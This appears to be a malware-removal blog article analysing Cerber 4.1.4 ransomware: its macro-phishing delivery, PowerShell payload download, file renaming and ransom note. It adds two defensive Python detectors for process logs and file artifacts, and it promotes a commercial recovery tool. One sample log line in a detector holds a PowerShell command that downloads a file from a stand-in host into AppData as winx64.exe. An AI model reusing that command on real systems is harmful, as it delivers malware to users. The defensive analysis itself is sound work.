Cerber, one of the most widespread ransomware families, has released yet another iteration of its fourth variant. This build changes how the malware communicates with its C&C servers and slightly alters its infection method, switching to malicious macros as the initial vector. Encryption is largely unchanged: Cerber still alters the names of encrypted files and appends a random four-character extension made of the characters A-Z and 0-9. Anyone infected by this iteration of Cerber should focus on removing it from the computer rather than paying the ransom. If you are looking for ways to remove Cerber yourself and attempt to restore the encrypted files, we suggest reading the following article thoroughly.
| Attribute | Details |
|---|---|
| Short Description | This Cerber ransomware variant 4.1.4 encrypts files with the RSA or AES ciphers, appends four randomly generated A-Z, 0-9 characters (e.g. `.z33f`) as the extension of each encrypted file, and demands a ransom payment for decryption. |
| Symptoms | Files are enciphered and become inaccessible to any software. Several ransom notes with payment instructions appear as "Readme.hta" files. |
| Distribution Method | Via malicious macros in Microsoft Office or Adobe Reader documents. |
| Detection Tool | See If Your System Has Been Affected by Cerber 4.1.4 (Malware Removal Tool) |
| Data Recovery Tool | Stellar Phoenix Data Recovery Technicians License (Pro version with more features). Notice: this product scans your drive sectors to recover lost files; it may recover only some of the encrypted files rather than all of them, depending on the situation and on whether you have reformatted your drive. |
| User Experience | Join our forum to discuss Cerber Ransomware. |
Cerber 4.1.4 – In-Depth Information
To help you understand how Cerber ransomware version 4.1.4 operates, we walk through the threat step by step, from distribution to the final ransom payment URL.
Cerber 4.1.4’s Distribution and Infection
To achieve a successful infection, the creators of Cerber 4.1.4 have most likely used a type of tool known in the research field as a file joiner, which combines malicious files with legitimate documents. This tool would have let the coders build an obfuscated macro infection that is activated only when you enable macros on a Microsoft Office document shortly after opening it:
The procedure for spreading this malware is much the same as for most ransomware. Phishing e-mails are used to spam the user and trick them into opening malicious documents. The documents distributing Cerber 4.1.4 are primarily in .doc format and carry random digit names, like the following:
Such a document arrives attached to a fraudulent spam message that tries to convince the user, with false claims, that the document is important, for example:
Once the malicious macro runs, the infection may execute in an obfuscated manner, which brings us to another tool used by the coders of Cerber 4.1.4: malware obfuscators, which evade detection by most conventional and widely used anti-virus programs.
Related Article: Obfuscation in Malware – The Key to a Successful Infection
The malicious macros open PowerShell as an administrator in Windows only to quietly execute a command similar to the following:
The malware then downloads the real payload of Cerber 4.1.4 by connecting to a remote server via another PowerShell command, similar to the following, as reported by Bleeping Computer researchers:
As shown, Cerber ransomware's payload is downloaded as a file named winx64.exe, located in the %AppData% folder.
As soon as the malicious file is downloaded, the malware automatically starts it, and it begins encrypting the victim's files.
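The chain described above (an Office macro launching PowerShell, a fetch from a remote server, and the payload winx64.exe dropped under %AppData%) can be turned into a simple process-log triage rule. This is an added example written for this article, not code from the researchers or vendors mentioned; the flattened `parent=|image=|cmdline=` record format, the set of Office parent processes and the sample log lines are constructed assumptions.

```python
import ntpath
import re
from dataclasses import dataclass

# Assumptions: Office parents worth flagging, and the payload name reported in the article.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
PAYLOAD_NAME = "winx64.exe"
APPDATA_RE = re.compile(r"\\appdata\\", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)

@dataclass
class ProcEvent:
    parent: str    # parent image name, lower-cased
    image: str     # child image name, lower-cased
    cmdline: str   # child command line, as logged

def parse_event(line):
    """Parse one constructed 'parent=...|image=...|cmdline=...' process-creation record."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcEvent(ntpath.basename(fields["parent"]).lower(),
                     ntpath.basename(fields["image"]).lower(),
                     fields["cmdline"])

def score_event(ev):
    """Return the Cerber 4.1.4 infection-chain indicators this event matches."""
    reasons = []
    if ev.parent in OFFICE_PARENTS and ev.image == "powershell.exe":
        reasons.append("office-spawned-powershell")        # macro handing off to PowerShell
    if URL_RE.search(ev.cmdline):
        reasons.append("remote-download-in-commandline")   # payload fetched from a remote server
    if APPDATA_RE.search(ev.cmdline) and PAYLOAD_NAME in ev.cmdline.lower():
        reasons.append("winx64-drop-in-appdata")           # %AppData%\winx64.exe
    return reasons

def triage(log_text):
    """Return [(line_no, reasons)] for every record matching at least one indicator."""
    hits = []
    for no, line in enumerate(log_text.strip().splitlines(), start=1):
        reasons = score_event(parse_event(line))
        if reasons:
            hits.append((no, reasons))
    return hits

# Constructed sample records: only the second one reproduces the chain in the article.
SAMPLE_LOG = r"""
parent=explorer.exe|image=C:\Windows\System32\notepad.exe|cmdline=notepad.exe report.txt
parent=WINWORD.EXE|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=powershell.exe -Command (New-Object Net.WebClient).DownloadFile('http://example.invalid/p','C:\Users\victim\AppData\Roaming\winx64.exe')
parent=explorer.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=powershell.exe Get-ChildItem C:\Users\victim\Documents
"""

if __name__ == "__main__":
    for line_no, reasons in triage(SAMPLE_LOG):
        print(line_no, ", ".join(reasons))
```

A single indicator (a URL in a PowerShell command line, say) is common in legitimate administration; the combination of all three on one event is what makes the record worth an alert.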
Cerber 4.1.4 – Post-Infection Analysis
Cerber ransomware has not changed its already strong and so far unbroken encryption. It still uses an immensely strong combination of the RSA and AES encryption algorithms to scramble files of the following types:
- Microsoft Office documents.
- Adobe Reader files.
- Adobe Photoshop and other Adobe software files.
- Audio files.
- Virtual machines.
After encryption, the affected files are:
- No longer openable.
- Renamed.
- Given a changed file extension.
Cerber also drops its distinctive "Readme.hta" ransom note file, which once more leads to the standard Cerber payment web page:
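The artifacts this section lists (a four-character A-Z, 0-9 extension on renamed files and a Readme.hta note in affected folders) can be checked for on a file share or a recovered disk image with a small scanner. The following is an added example written for this article, not the page's or any vendor's tool; the sample paths, the allow-list of legitimate four-character extensions and the per-folder threshold are assumptions.

```python
import re
from collections import defaultdict

# Cerber 4.1.4 appends four A-Z/0-9 characters (e.g. ".z33f") to each encrypted file.
RANDOM_EXT_RE = re.compile(r"^\.[a-z0-9]{4}$", re.IGNORECASE)
# Assumption: legitimate extensions that also match the pattern; extend per environment.
KNOWN_4CHAR_EXTS = {".docx", ".xlsx", ".pptx", ".json", ".html", ".jpeg",
                    ".webp", ".yaml", ".toml", ".mpeg", ".heic"}
RANSOM_NOTE = "readme.hta"
MIN_RENAMED_PER_DIR = 3  # assumption: threshold that cuts false positives from odd extensions

def classify(path):
    """Return (directory, kind) where kind is 'note', 'renamed' or None."""
    norm = path.replace("\\", "/")
    directory, _, name = norm.rpartition("/")
    if name.lower() == RANSOM_NOTE:
        return directory, "note"
    dot = name.rfind(".")
    ext = name[dot:] if dot > 0 else ""
    if RANDOM_EXT_RE.match(ext) and ext.lower() not in KNOWN_4CHAR_EXTS:
        return directory, "renamed"
    return directory, None

def triage(paths):
    """Group artifacts per folder and keep the folders that look hit by Cerber."""
    per_dir = defaultdict(lambda: {"note": False, "renamed": 0})
    for p in paths:
        directory, kind = classify(p)
        if kind == "note":
            per_dir[directory]["note"] = True
        elif kind == "renamed":
            per_dir[directory]["renamed"] += 1
    return {d: v for d, v in per_dir.items()
            if v["note"] or v["renamed"] >= MIN_RENAMED_PER_DIR}

# Constructed sample listing: Documents holds the note, Pictures only renamed files.
SAMPLE_PATHS = [
    r"C:\Users\victim\Documents\Readme.hta",
    r"C:\Users\victim\Documents\8f2a1c0e4b7d.z33f",
    r"C:\Users\victim\Documents\1a2b3c4d5e6f.z33f",
    r"C:\Users\victim\Documents\budget.xlsx",
    r"C:\Users\victim\Pictures\holiday.jpeg",
    r"C:\Users\victim\Pictures\a0b1c2d3e4f5.q9k2",
    r"C:\Users\victim\Pictures\bb0c1d2e3f4a.q9k2",
    r"C:\Users\victim\Pictures\cc1d2e3f4a5b.q9k2",
    r"C:\Users\victim\Downloads\notes.json",
]

if __name__ == "__main__":
    for folder, info in triage(SAMPLE_PATHS).items():
        print(folder, info)
```

Because the extension pattern alone also matches many legitimate formats, the scanner only reports a folder when it contains the ransom note or several renamed files.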
After this has been completed, the ransomware may heavily modify registry entries so that the malicious executable in the %AppData% folder runs every time Windows starts and encrypts newly added files or files on removable drives such as USB sticks.
How to Remove Cerber 4.1.4 Virus and Try To Get Back Encrypted Files
Cerber 4.1.4 is yet another of the many Cerber variants we have detected in the wild. The malware is very sophisticated, and researchers have yet to discover any bug in its code that would allow them to crack it, as they did with the first variant of Cerber.
If you are looking for ways to restore files encoded by this threat, our advice is to act immediately and remove it safely using the instructions below. You can try to remove it manually, but we strongly recommend using a professional malware removal tool to do the job swiftly and safely.
After the removal steps, we offer several alternative suggestions that may help you recover your unopenable files. We are constantly researching new data recovery methods. Since sophisticated malware like Cerber deletes the original files with several passes, it is very difficult to find a solution that is 100% effective. Still, we will keep researching this threat and will update this article if a decryptor is released, so we advise following our blog regularly.